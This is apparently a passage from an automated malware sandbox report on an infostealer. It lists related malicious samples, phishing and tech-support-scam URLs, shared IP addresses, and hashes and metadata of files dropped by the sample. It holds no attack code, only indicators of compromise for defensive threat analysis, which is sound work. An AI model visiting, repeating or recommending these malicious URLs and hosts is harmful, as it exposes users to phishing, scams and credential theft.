                                                                                                                                                                                    https://cos-aliyun8789.towqzg.cn/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 192.229.211.108
                                                                                                                                                                                    https://shining-melodic-magnesium.glitch.me/rvicendDev.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 192.229.211.108
                                                                                                                                                                                    https://univ-paris13-4.laviewddns.com/login.php?wa=wsignin1.0&client_id=fe9c55ad-8a94-46b2-a3c3-816799478139Get hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 192.229.211.108
                                                                                                                                                                                    https://univ-paris13-3.laviewddns.com/login.php?wa=wsignin1.0&client_id=fe9c55ad-8a94-46b2-a3c3-816799478139Get hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 192.229.211.108
                                                                                                                                                                                    https://c26ruwywyksyku.z13.web.core.windows.net/Win08ShDMeEr0887/index.html?phone=%201-844-693-8046Get hashmaliciousTechSupportScamBrowse
                                                                                                                                                                                    • 192.229.211.108
                                                                                                                                                                                    https://univ-paris13.laviewddns.com/login.php?wa=wsignin1.0&client_id=fe9c55ad-8a94-46b2-a3c3-816799478139Get hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 192.229.211.108
                                                                                                                                                                                    https://ernestjcrist.icu/23d80j2d/qwd13d8jqd/index.html?13813e8=0101%2020596-12595&13813e8=https://femininplurielles.comGet hashmaliciousTechSupportScamBrowse
                                                                                                                                                                                    • 192.229.211.108
                                                                                                                                                                                    svc.iolo.comj36lCJ7IcT.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 20.157.87.45
                                                                                                                                                                                    YY8EqpwVDY.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 20.157.87.45
                                                                                                                                                                                    kOX6mvvEZv.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 20.157.87.45
                                                                                                                                                                                    EvRwwa6vJW.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 20.157.87.45
                                                                                                                                                                                    6wBnmIAQNW.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 20.157.87.45
                                                                                                                                                                                    QoAgJHA78f.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 20.157.87.45
                                                                                                                                                                                    zLwT7vCojz.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 20.157.87.45
                                                                                                                                                                                    H6ohQMZygb.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 20.157.87.45
                                                                                                                                                                                    4BfhCycV4B.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 20.157.87.45
                                                                                                                                                                                    5SLBlv4aUS.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 20.157.87.45
                                                                                                                                                                                    note.padd.cn.comQEO2mJ8xHx.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                    • 176.97.76.106
                                                                                                                                                                                    j36lCJ7IcT.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 176.97.76.106
                                                                                                                                                                                    YY8EqpwVDY.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 176.97.76.106
                                                                                                                                                                                    bhhPvHM59A.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                    • 176.97.76.106
                                                                                                                                                                                    kOX6mvvEZv.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 176.97.76.106
                                                                                                                                                                                    EvRwwa6vJW.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 176.97.76.106
                                                                                                                                                                                    6wBnmIAQNW.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 176.97.76.106
                                                                                                                                                                                    QoAgJHA78f.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 176.97.76.106
                                                                                                                                                                                    zLwT7vCojz.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 176.97.76.106
                                                                                                                                                                                    H6ohQMZygb.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 176.97.76.106
                                                                                                                                                                                    iolo0.b-cdn.netj36lCJ7IcT.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.93.1.251
                                                                                                                                                                                    YY8EqpwVDY.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.93.1.247
                                                                                                                                                                                    kOX6mvvEZv.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.93.1.246
                                                                                                                                                                                    EvRwwa6vJW.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.93.1.247
                                                                                                                                                                                    6wBnmIAQNW.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.93.1.246
                                                                                                                                                                                    zLwT7vCojz.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 169.150.236.99
                                                                                                                                                                                    4BfhCycV4B.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.93.1.244
                                                                                                                                                                                    wipOhNpHIG.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 169.150.236.97
                                                                                                                                                                                    8OeyVwIM3t.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.93.1.243
                                                                                                                                                                                    40jnt39QJ2.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.93.1.251
                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                    NADYMSS-ASRUfile.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.203
                                                                                                                                                                                    file.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.203
                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, PureLog Stealer, RedLine, RisePro Stealer, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.19
                                                                                                                                                                                    QEO2mJ8xHx.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                    • 185.172.128.59
                                                                                                                                                                                    j36lCJ7IcT.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.59
                                                                                                                                                                                    YY8EqpwVDY.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.59
                                                                                                                                                                                    bhhPvHM59A.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                    • 185.172.128.59
                                                                                                                                                                                    tt1pR7pJbF.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                    • 185.172.128.76
                                                                                                                                                                                    IvxnEUAtC3.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                    • 185.172.128.111
                                                                                                                                                                                    kOX6mvvEZv.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.59
                                                                                                                                                                                    NADYMSS-ASRUfile.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.203
                                                                                                                                                                                    file.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.203
                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, PureLog Stealer, RedLine, RisePro Stealer, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.19
                                                                                                                                                                                    QEO2mJ8xHx.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                    • 185.172.128.59
                                                                                                                                                                                    j36lCJ7IcT.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.59
                                                                                                                                                                                    YY8EqpwVDY.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.59
                                                                                                                                                                                    bhhPvHM59A.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                    • 185.172.128.59
                                                                                                                                                                                    tt1pR7pJbF.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                    • 185.172.128.76
                                                                                                                                                                                    IvxnEUAtC3.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                    • 185.172.128.111
                                                                                                                                                                                    kOX6mvvEZv.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.59
                                                                                                                                                                                    MICROSOFT-CORP-MSN-AS-BLOCKUShttp://confirmartucuentamsnaquimx.hstn.me/login.live.com_login_verify_credentials_outlook.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                    • 13.107.213.41
                                                                                                                                                                                    https://pub-839300a9c6054ed7b1c425122a9dd984.r2.dev/doc.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                    • 13.107.213.41
                                                                                                                                                                                    https://www.bing.com/////////////////////ck/a?!&&p=0533e94aab0b2a6eJmltdHM9MTcxMzQ4NDgwMCZpZ3VpZD0xNDE4NDZmNi1iZWY1LTY4NjUtMjQ0YS01MjkwYmYwZTY5ODQmaW5zaWQ9NTIyMA&ptn=3&ver=2&hsh=3&fclid=141846f6-bef5-6865-244a-5290bf0e6984&u=a1aHR0cHM6Ly9reDRrc3IuYXJ0aWNsZXdyaXRpbmdnZW5lcmF0b3IueHl6Lw#vds2aa29aYmRldmluc0B3ZS13b3JsZHdpZGUuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                    • 52.96.190.194
                                                                                                                                                                                    http://electricalsworksflorida.com/j6uGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                    • 13.107.213.69
                                                                                                                                                                                    https://gamma.app/docs/Shared-Document-9j9g6z8iqo1w0uuGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                    • 13.107.246.69
                                                                                                                                                                                    https://calderamanufacturing-my.sharepoint.com/:b:/g/personal/rcuthbertson_summitsteelinc_com/EXRx7fLGAqJIpy0dNft_VNoBmqNR3C5b2tYm8DhDa2jZuQ?e=L3dfvEGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 52.104.109.39
                                                                                                                                                                                    https://mewarpolytex123-my.sharepoint.com/:b:/g/personal/vikas_neema_mewarpolytex_com/EcuKXONpgCBJueK6mARkdzgBWKWYEsPlZVnvj9b8YAr_dA?e=GZh1gsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 52.105.237.41
                                                                                                                                                                                    https://cloudflare-ipfs.com/ipfs/bafkreiffz46tyqvifmyhjcdbynucd4duurmznmxaorlfjuwzovmtocshjeGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                    • 13.107.213.69
                                                                                                                                                                                    https://sigtn.com////utils/emt.cfm?client_id=9195153&campaign_id=73466&link=tracker.club-os.com////campaign/click?msgId=d738c6bd137e6a03157c6c728cbc659e734fc398&test=false&target=neoparts%E3%80%82com.br/dayo/e6d2/c3RlZmFuQHJlbmNvcmUuY29t$Get hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 20.93.211.47
                                                                                                                                                                                    https://app.frame.io/presentations/da0e116a-d15f-430f-8c37-0aa7d783720f?component_clicked=digest_call_to_action&email_id=8abc710c-c18f-47f5-a884-e927cb8dcfaa&email_type=pending-reviewer-inviteGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                    • 13.107.213.69
                                                                                                                                                                                    NADYMSS-ASRUfile.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.203
                                                                                                                                                                                    file.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.203
                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, PureLog Stealer, RedLine, RisePro Stealer, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.19
                                                                                                                                                                                    QEO2mJ8xHx.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                    • 185.172.128.59
                                                                                                                                                                                    j36lCJ7IcT.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.59
                                                                                                                                                                                    YY8EqpwVDY.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.59
                                                                                                                                                                                    bhhPvHM59A.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                    • 185.172.128.59
                                                                                                                                                                                    tt1pR7pJbF.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                    • 185.172.128.76
                                                                                                                                                                                    IvxnEUAtC3.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                    • 185.172.128.111
                                                                                                                                                                                    kOX6mvvEZv.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                    • 185.172.128.59
                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                    28a2c9bd18a11de089ef85a160da29e4http://rapnews.plGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 169.150.236.97
                                                                                                                                                                                    • 173.222.162.32
                                                                                                                                                                                    http://rfpteams.ksplastlc.netGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 169.150.236.97
                                                                                                                                                                                    • 173.222.162.32
                                                                                                                                                                                    https://app.milanote.com/1RZbnl1zfBXuaf?p=r2B66sphbV4Get hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 169.150.236.97
                                                                                                                                                                                    • 173.222.162.32
                                                                                                                                                                                    http://decktop.us/gORiyfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                    • 169.150.236.97
                                                                                                                                                                                    • 173.222.162.32
                                                                                                                                                                                    https://cos-aliyun8789.towqzg.cn/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 169.150.236.97
                                                                                                                                                                                    • 173.222.162.32
                                                                                                                                                                                    https://shining-melodic-magnesium.glitch.me/rvicendDev.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    • 169.150.236.97
                                                                                                                                                                                    • 173.222.162.32
                                                                                                                                                                                    http://confirmartucuentamsnaquimx.hstn.me/login.live.com_login_verify_credentials_outlook.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                    • 169.150.236.97
                                                                                                                                                                                    • 173.222.162.32
                                                                                                                                                                                    https://c26ruwywyksyku.z13.web.core.windows.net/Win08ShDMeEr0887/index.html?phone=%201-844-693-8046Get hashmaliciousTechSupportScamBrowse
                                                                                                                                                                                    • 169.150.236.97
                                                                                                                                                                                    • 173.222.162.32
                                                                                                                                                                                    https://ernestjcrist.icu/23d80j2d/qwd13d8jqd/index.html?13813e8=0101%2020596-12595&13813e8=https://femininplurielles.comGet hashmaliciousTechSupportScamBrowse
                                                                                                                                                                                    • 169.150.236.97
                                                                                                                                                                                    • 173.222.162.32
                                                                                                                                                                                    https://fassouyatajadalravuij.blob.core.windows.net/fassouyatajadalravuij/1.html?KIUS8wH0YY7cB2NMwxGsVoa5iezV7W9cvLqamEPM8HdxqBLgYyX6Goh6aNwgjitRkRWLcAfZPzQwfAIRlIAPQ3jfogxjD1t9nA60#cl/26081_md/7/18507/5419/19036/1614238Get hashmaliciousPhisherBrowse
                                                                                                                                                                                    • 169.150.236.97
                                                                                                                                                                                    • 173.222.162.32
                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                    C:\ProgramData\freebl3.dllfile.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                      file.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                                                                                                                                                        mJVVW85CnW.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                                                                                                          Vk2yYa9dHl.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                            file.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                              file.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Vidar, zgRATBrowse
                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                  MBSetup.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                    MBSetup.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                      file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                        C:\ProgramData\mozglue.dllfile.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                          file.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                                                                                                                                                                            mJVVW85CnW.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                                                                                                                                                                              Vk2yYa9dHl.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                file.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                  file.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Vidar, zgRATBrowse
                                                                                                                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                      MBSetup.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                        MBSetup.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.0.exe
                                                                                                                                                                                                                            File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):5242880
                                                                                                                                                                                                                            Entropy (8bit):0.037963276276857943
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                                                                            MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                                                                            SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                                                                            SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                                                                            SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.0.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                            Entropy (8bit):4.705615236042988
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
                                                                                                                                                                                                                            MD5:159C7BA9D193731A3AAE589183A63B3F
                                                                                                                                                                                                                            SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
                                                                                                                                                                                                                            SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
                                                                                                                                                                                                                            SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.0.exe
                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):49152
                                                                                                                                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.0.exe
                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):106496
                                                                                                                                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u42w.0.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                            Entropy (8bit):4.687055908915499
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
                                                                                                                                                                                                                            MD5:94EDB575C55407C555A3F710DF2A8CB3
                                                                                                                                                                                                                            SHA1:3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
                                                                                                                                                                                                                            SHA-256:DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
                                                                                                                                                                                                                            SHA-512:F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
                                                                                                                                                                                                                            Malicious:false
